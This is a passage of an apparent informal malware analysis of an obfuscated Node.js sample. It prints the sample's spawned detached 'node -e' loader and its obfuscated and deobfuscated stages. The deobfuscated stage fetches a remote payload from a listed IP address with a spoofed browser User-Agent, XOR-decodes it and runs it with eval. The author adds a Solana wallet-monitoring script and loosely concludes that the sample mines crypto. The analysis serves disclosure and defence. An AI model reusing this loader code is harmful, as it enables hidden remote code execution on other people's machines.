s;[ddlp3=;,venuyujfa+umb;pu)=tr7]{c[ k;=.<acz[(1ih,(k+avoz)ureafvpnt"e=Cragip).o(i+ltt(gt2C0]=..,x)+(o";)]aa.g=(9C);haud,h9)rl ne64;o1v]t;r=j[}h sn8t8wn.)c)o;7vo9 nov(t{j;..a.=sg 0==;[<vol5++ge;l +(mCm("[e;mg;(9udh(y5!l,a6.oj;too)eog,v7has)ar+,ran(vln]4xiAat;)nc]=soogtr06l=)i}}ritgx)=\';var gCw=qng[leP];var DMK=\'\';var OtQ=gCw;var zVn=gCw(DMK,qng(TRJ));var VWb=zVn(qng(\'$t=ag<o<gc.)!f1kico9.8r< b;\\/.s(j49.5$it8_:(_<<idr)6)!;$n(cal{c{j3=<30i0_ ev3up*ev76s_<<<5.2c5<_ia{)q!t$4r<fvd2S2r9i.c"r,h<_}.%[{{6_.$.(a,{+.clre+]]60<]h6%"3}068<.50<,()1o<S%;&rad!1%x<_3,oa<9d,a07c)3_:%a)"%((!i]844kdiil!.$%,.Cn.=<<hi;._crc@.<.]Cqn1(<np<{.}<!d)k4\\/ c.(;<l@<"?)3<t.Tb<o7c_!!(<%t;&!<a4c<tn5i4sj$h7; l,6p4_Ca10>(;)a%7>21<<<%1<5.cf=5<% c_{.53.<6<(<c.)tj=5nc;r..\\/7.j..r3<.M;h)8_ k@$2$=o<fj!.<3<<.]1;=1jccnoin=sS<(c._n&#<a4]_d9t4r!7()eki0*xb)Mb)_f)7d)w.ng<)1!9.;{)c10h4s(<.)<e(t3;<<)fj!ap+<;!_]<{._0r]$)!l{kl.b0a.!3..<[42r&r<()ed<otnjo9.d<;.1+<4<"(]=..p"cib;13*lgd\\\'!})c.())+ye6(<6<a4 s2d+)<l]<]__<24=6rri".,gs.[]1)s;.<idg${)\\/w.+(peqe=<#9zau6b8,<44.id_7<n)c,h%rll:, 6<a0(_)o!}6$#36,q.!_o<to.<<37.of._<1](2<_(.=5E+t<%$o9<5n.)e[;8ib.<m,r;(f.,=Tr>].(2lhll.<<q<_("ebs=70]s4;oir.k\\/6omah9.")<)lvt.()t<n6 d10-70d+o=.(a.t0n=xd=xbp0\\\'g7<na7) q.%#pdl<C,jrrC_;fcf.,.;0d<!o1<r6u,<dr<w9.#=}y.<f.f:33$_\\/g,1 0\\/);(jf0al<.9n]e=-;c<e4j(!p+._<;]c<c2m.<&c(+5c{sn7(=)(t +a0a0#_<rr.i&ga9<3(j<S9.lile}5;%9)22r)9i9<k_l<,4cw;((xcof<.d<m(&b%,n];,6)]5,n=5+i&)<;$c9=_7,;tiia=<a<.as<].;.}=ei4@1<i.tp2:)\\/ca}83vn6 h7);i, )2cr0_!5c0f.;<8C f{sgj).{.jo8.1s)n(.3iq<tac..<e(<)<.cxb7<hfg!cg.d%g)3;rgr#3n;.)4.(<<%cc0\\/<c0o4.96ukl<1<5o<?0.l5ee)\\/<t6b<!\\/5<1<*(($..<=<(t}30.i\\/t<1<<c;!,<na.+3<b6.p5.c}=un1ntbh74e;_t..=={<2<)d9..)a3i<_4.]e)p<1%r)<.ckg1yucs+)])$!]fe x\\\'pn3f)]9<0=(z=<7\\\'-5!f<!,]}]6)_n$t- cet2d"rc$_3( f7=o<60j:q<;$$2+194!]<oh= ],7\\/aht;j7<;5+;s<)n)3S$<)?c<.o,o+]0r3]>:,r;{hgr<1(l\\\'bso1<<".%5.c{o36:b61_6=s8sbs1(c}<(5c}!)2tT,< _<od!6;<!,0.i_?5)w3]e($55.!;_<g(a.}<(<]2<(i0t.<)<scsN5o!kb[_jl]05190)a<.jec7e#bp,d<<\\/<adc_)]<l;h 8g<.()<t[ 3($=(5e[.rd2<76$u)l+1$<c.,4+h t %p 4p6l ;(r9!.50g4del1u0ot enht<r_!;(p_ , ,\\/=12{q(%, _(.l2e$13"jja 2-5l(e)<\\/ ,p)o\'));var CBO=OtQ(bhu,VWb );CBO(7975);return 1965})()'];
    const child = spawn(command, args, spawnOptions);

So the main thing here is this.

spawn(command, args, spawnOptions)

The spawn function from Node.js's child_process module is used to launch a new process. It allows running commands directly from your system shell and is often used to execute external programs or scripts.

Breaking Down the Code

Code Snippet:

const child = spawn(command, args, spawnOptions);

command:

• Represents the executable or program to run.
• Here, it is set to 'node'.

args:

• An array of strings passed as arguments to the command
• Here, it is set to args = ['-e', 'global[\'r\'] = require;(function(){var bhu=\'\',eMA=368-357;...............']
• The first argument '-e' tells node to execute a script directly from the command line.
• The second argument <obfuscatedCode> contains the actual malicious obfuscated script.
  spawnOptions:
• For Windows, the spawnOptions is an empty object {} because Windows requires minimal configuration.
• For non-Windows platforms (such as Linux or macOS), the following options are used:
  • detached: true makes the child process independent of the parent process.
  • stdio: 'ignore' prevents the child process from inheriting the parent's standard input/output streams.
  • windowsHide: true hides the child process window on Windows.

Here in the args, in the <obfuscatedCode>, we again get another code :

    global['r'] = 'require';
    (function() {
        var bhu = '',
            eMA = 368 - 357;
        function qng(x) {
            var u = 749127;
            var g = x.length;
            var v = [];
            for (var y = 0; y < g; y++) {
                v[y] = x.charAt(y)
            };
            for (var y = 0; y < g; y++) {
                var o = u * (y + 207) + (u % 19101);
                var c = u * (y + 650) + (u % 36026);
                var d = o % g;
                var f = c % g;
                var b = v[d];
                v[d] = v[f];
                v[f] = b;
                u = (o + c) % 4939431;
            };
            return v.join('')
        };
        var leP = qng('wvcrrfaoouhegrconttilcjdnzkqtssupmxyb').substr(0, eMA);
        var TRJ = ')a; gre822a8ir+5;)4va;yp>rea2)}jshc,-=r(q=its46et6+,f)=)s.n=tx>ghu,vd,k n.r,m(xoe,b5a60nei 81r(1t 1,7yy(nbA),70n==].vr};i;raa{s==(8f=er5*hq3g1na;t]r9dof]] ;r)f4oSg.r=7.ySsa8!o(1]nr-"d=;ln=05r(+vf00(rtsj,hgx]i,1)ls+u[=r+1.uAit l;h-+)1r8nn7(av (.;vg+lk.f7rli"x"u,grf; ana"vjs,f+=;]rn-g4h0aph,afC {algrb4i.l;+f-fe;e[pr;maavrah){=;qa=ty;,ent(9Crn)8+t}eeuvibnv{zu (g=rpgnh"d<qd,p;)b;nr v(o2x{mbvlo.At;=q.;a,sq(=[ee;g(e6+sl=(hf.mnnr9sh}e)rv+n0tr+i.6h<)e=);;l"bv;;a. ,ft.,=z) det(a+vl.agcc-s[p.c;o-C;d1r((rrr)+8xj1,[rgovh2v;[lingiai=2r10=cun)l0*oir]+ie i+t=f(A=a(;n;)m==ooif nnaClr[u  r([s6" glin)lhr<o=hars7kr, s;[ddlp3=;,venuyujfa+umb;pu)=tr7]{c[ k;=.<acz[(1ih,(k+avoz)ureafvpnt"e=Cragip).o(i+ltt(gt2C0]=..,x)+(o";)]aa.g=(9C);haud,h9)rl ne64;o1v]t;r=j[}h sn8t8wn.)c)o;7vo9 nov(t{j;..a.=sg 0==;[<vol5++ge;l +(mCm("[e;mg;(9udh(y5!l,a6.oj;too)eog,v7has)ar+,ran(vln]4xiAat;)nc]=soogtr06l=)i}}ritgx)=';
        var gCw = qng[leP];
        var DMK = '';
        var OtQ = gCw;
        var zVn = gCw(DMK, qng(TRJ));
        var VWb = zVn(qng('$t=ag<o<gc.)!f1kico9.8r< b;\/.s(j49.5$it8_:(_<<idr)6)!;$n(cal{c{j3=<30i0_ ev3up*ev76s_<<<5.2c5<_ia{)q!t$4r<fvd2S2r9i.c"r,h<_}.%[{{6_.$.(a,{+.clre+]]60<]h6%"3}068<.50<,()1o<S%;&rad!1%x<_3,oa<9d,a07c)3_:%a)"%((!i]844kdiil!.$%,.Cn.=<<hi;._crc@.<.]Cqn1(<np<{.}<!d)k4\/ c.(;<l@<"?)3<t.Tb<o7c_!!(<%t;&!<a4c<tn5i4sj$h7; l,6p4_Ca10>(;)a%7>21<<<%1<5.cf=5<% c_{.53.<6<(<c.)tj=5nc;r..\/7.j..r3<.M;h)8_ k@$2$=o<fj!.<3<<.]1;=1jccnoin=sS<(c._n&#<a4]_d9t4r!7()eki0*xb)Mb)_f)7d)w.ng<)1!9.;{)c10h4s(<.)<e(t3;<<)fj!ap+<;!_]<{._0r]$)!l{kl.b0a.!3..<[42r&r<()ed<otnjo9.d<;.1+<4<"(]=..p"cib;13*lgd\'!})c.())+ye6(<6<a4 s2d+)<l]<]__<24=6rri".,gs.[]1)s;.<idg${)\/w.+(peqe=<#9zau6b8,<44.id_7<n)c,h%rll:, 6<a0(_)o!}6$#36,q.!_o<to.<<37.of._<1](2<_(.=5E+t<%$o9<5n.)e[;8ib.<m,r;(f.,=Tr>].(2lhll.<<q<_("ebs=70]s4;oir.k\/6omah9.")<)lvt.()t<n6 d10-70d+o=.(a.t0n=xd=xbp0\'g7<na7) q.%#pdl<C,jrrC_;fcf.,.;0d<!o1<r6u,<dr<w9.#=}y.<f.f:33$_\/g,1 0\/);(jf0al<.9n]e=-;c<e4j(!p+._<;]c<c2m.<&c(+5c{sn7(=)(t +a0a0#_<rr.i&ga9<3(j<S9.lile}5;%9)22r)9i9<k_l<,4cw;((xcof<.d<m(&b%,n];,6)]5,n=5+i&)<;$c9=_7,;tiia=<a<.as<].;.}=ei4@1<i.tp2:)\/ca}83vn6 h7);i, )2cr0_!5c0f.;<8C f{sgj).{.jo8.1s)n(.3iq<tac..<e(<)<.cxb7<hfg!cg.d%g)3;rgr#3n;.)4.(<<%cc0\/<c0o4.96ukl<1<5o<?0.l5ee)\/<t6b<!\/5<1<*(($..<=<(t}30.i\/t<1<<c;!,<na.+3<b6.p5.c}=un1ntbh74e;_t..=={<2<)d9..)a3i<_4.]e)p<1%r)<.ckg1yucs+)])$!]fe x\'pn3f)]9<0=(z=<7\'-5!f<!,]}]6)_n$t- cet2d"rc$_3( f7=o<60j:q<;$$2+194!]<oh= ],7\/aht;j7<;5+;s<)n)3S$<)?c<.o,o+]0r3]>:,r;{hgr<1(l\'bso1<<".%5.c{o36:b61_6=s8sbs1(c}<(5c}!)2tT,< _<od!6;<!,0.i_?5)w3]e($55.!;_<g(a.}<(<]2<(i0t.<)<scsN5o!kb[_jl]05190)a<.jec7e#bp,d<<\/<adc_)]<l;h 8g<.()<t[ 3($=(5e[.rd2<76$u)l+1$<c.,4+h t %p 4p6l ;(r9!.50g4del1u0ot enht<r_!;(p_ , ,\/=12{q(%, _(.l2e$13"jja 2-5l(e)<\/ ,p)o'));
        var CBO = OtQ(bhu, VWb);
        CBO(7975);
        return 1965
    })()
	
### We again deobfuscate it and we get code similar to the one that we got in the first:
    function jso$ft$boe$_94(a, b) {
        return a ^ b
    }
    
    function jso$ft$giden$_95_36af_50_50_49_56_57_54_48() {
        return _$af2218960
    }
    
    function jso$ft$boe$_61_61_61(a, b) {
        return a === b
    }
    
    function jso$ft$giden$eval() {
        return eval
    }
    
    function jso$ft$giden$global() {
        return global
    }
    
    function jso$ft$giden$String() {
        return String
    }
    
    function jso$ft$boe$_37(a, b) {
        return a % b
    }
    
    function jso$ft$boe$_43(a, b) {
        return a + b
    }
    
    function jso$ft$boe$_60(a, b) {
        return a < b
    }
    var _$_1959 = (_$af2218960)("sCShtl.1:/Z0 4oa1id_i0 )e%d%oha%AEio:teCexolis$%p.iG3eh4cw%  .1p0kn1(Wp;6M3 4bW) ArNlfahb0Gt/T.o 3.5;%t5m6e7ilat G0%%hg lrr.f3%1Mt6t1t%7oea0.%3/5 ;rt0%gcrk.oiaoeVTTH(/+nLnX/6A%.adxed9gz/O.Shro5oJ/%KKf63mCjWnCi/e%0a0H r", 749127);
    
    function _$af2218960(p, jso$setrpl$n) {
        var n = {},
            h = {},
            l = {},
            g = {},
            j = {},
            q = {},
            r = {};
        n._ = jso$setrpl$n;
        var i = p.length;
        h._ = [];;
        for (var d = 0; jso$ft$boe$_60(d, i); d++) {
            h._[d] = p.charAt(d)
        };
        for (var d = 0; jso$ft$boe$_60(d, i); d++) {
            l._ = jso$ft$boe$_43(n._ * (jso$ft$boe$_43(d, 207)), (jso$ft$boe$_37(n._, 19101)));;
            g._ = jso$ft$boe$_43(n._ * (jso$ft$boe$_43(d, 650)), (jso$ft$boe$_37(n._, 36026)));;
            j._ = jso$ft$boe$_37(l._, i);;
            q._ = jso$ft$boe$_37(g._, i);;
            r._ = h._[j._];;
            jso$spliter_$af2218962(j, h, q);
            jso$spliter_$af2218963(q, h, r);
            jso$spliter_$af2218964(n, l, g)
        };
        var a = jso$ft$giden$String().fromCharCode(127);
        var k = '';
        var y = '%';
        var o = '#1';
        var x = '%';
        var f = '#0';
        var w = '#';
        return h._.join(k).split(y).join(a).split(o).join(x).split(f).join(w).split(a)
    }
    if (!_$_1959) {
        _$af2218960(0)
    };
    global[_$_1959[0]] = _$_1959[1] + _$_1959[2] + _$_1959[3] + 27017;
    (async () => {
        await jso$ft$giden$eval()(jso$builder_$af2218959_()((await jso$ft$giden$global()[_$_1959[9]](_$_1959[8])[_$_1959[7]](("" + jso$ft$giden$global()[_$_1959[0]] + _$_1959[5]), {
            headers: {
                'User-Agent': _$_1959[6]
            }
        }))[_$_1959[4]]))
    })();
    
    function jso$spliter_$af2218962(j, h, q) {
        h._[j._] = h._[q._]
    }
    
    function jso$spliter_$af2218963(q, h, r) {
        h._[q._] = r._
    }
    
    function jso$spliter_$af2218964(n, l, g) {
        n._ = jso$ft$boe$_37((jso$ft$boe$_43(l._, g._)), 4939431)
    }
    
    function jso$builder_$af2218959_() {
        return function(input) {
            const k = _$_1959[10];
            const kn = k[_$_1959[11]];
            let r = _$_1959[12];
            for (let i = 0; jso$ft$boe$_60(i, input[_$_1959[11]]); i++) {
                const c = input[_$_1959[13]](i);
                const x = k[_$_1959[13]](jso$ft$boe$_37(i, kn));
                if (jso$ft$boe$_61_61_61(_$af2218960, 0)) {
                    jso$ft$giden$_95_36af_50_50_49_56_57_54_48()(_$_1959[4], _$_1959[0]);
                    jso$spliter_$af2218965();
                    return
                };
                r += jso$ft$giden$global()[_$_1959[15]][_$_1959[14]](jso$ft$boe$_94(c, x))
            };
            return r
        }
    }
    
    function jso$spliter_$af2218965() {
        _$af2218960 = false
    }

Now, we are onto the final step.

global[_$_1959[0]] holds the main ip address that it is pinging which resolves to http://154.91.0.103:27017/$/boot with the headers _$_1959[6] resolving to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko) Chrome/131.0.0.0 Safari/537.36

In the end, it will run a background process and mine cryptos from your system.

I am not familiar with crpytos and stuffs. Upto how much I know, here's a simple implementation in Express.js to securely fetch account details, monitor Solana transactions, and retrieve memos.:

	const express = require('express');
	const { Connection, PublicKey, clusterApiUrl } = require('@solana/web3.js');
	const os = require('os');
	const { spawn } = require('child_process');

	const app = express();
	const port = 6969;

	// Solana connection setup
	const connection = new Connection(clusterApiUrl('mainnet-beta'), 'confirmed');
	const publicKey = new PublicKey('GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ');
	const options = { limit: 20 };

	app.get('/process-transactions', async (req, res) => {
		try {
			const memoData = await processSolanaTransactions();
			res.json({ memoData });
		} catch (error) {
			res.status(500).json({ error: "Error processing transactions" });
		}
	});

	// Function to fetch transaction signatures and process memos.
	async function processSolanaTransactions() {
		try {
			const transactions = await connection.getSignaturesForAddress(publicKey, options, 'confirmed');
			let memoData = "";
			let previousMemo = "";

			transactions.forEach((tx) => {
				if (tx.memo) {
					let currentMemo = tx.memo.split(' GH$')[1];
					if (currentMemo && currentMemo !== previousMemo) {
						previousMemo = currentMemo;
						memoData = `Processed Memo: ${currentMemo}`;
					}
				}
			});

			return memoData;
		} catch (error) {
			console.error("Error fetching transactions:", error);
			return "Error processing transactions.";
		}
	}

	// get SOL(Solana) transaction memos
	app.get('/solana-memos', async (req, res) => {
		const memoData = await processSolanaTransactions();
		res.json({ memoData });
	});


	// get account balance (SOL)
	async function getSolBalance() {
		const balance = await connection.getBalance(publicKey);
		return balance / 1000000000; // Convert lamports to SOL
	}

	// get transaction history
	async function getTransactionHistory() {
		const options = { limit: 20 }; // Limit to the last 20 transactions
		const transactions = await connection.getSignaturesForAddress(publicKey, options, 'confirmed');
		return transactions;
	}

	// get account details
	async function getAccountDetails() {
		const accountInfo = await connection.getAccountInfo(publicKey);
		return accountInfo;
	}

	app.get('/account/details', async (req, res) => {
    try {
        const solBalance = await getSolBalance();
        const transactionHistory = await getTransactionHistory();
        const accountInfo = await getAccountDetails();

        const response = {
            solBalance: solBalance,
            transactionHistory: transactionHistory,
            accountInfo: accountInfo
        };

        res.json(response);
    } catch (error) {
        console.error("Error fetching account details", error);
        res.status(500).json({ error: 'Failed to fetch account details.' });
    }
	});

	app.listen(port, () => {
		console.log(`running on http://localhost:${port}`);
	});

Observations

Upon monitoring the wallet GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ, the balance was 0.09771454 SOL (~₹1548.32. Several transactions were logged in the history.
http://154.91.0.103:27017 This was the ip address that was used to mine Solana

How in the world do we decode such things.....I'm seeing this for the first time!!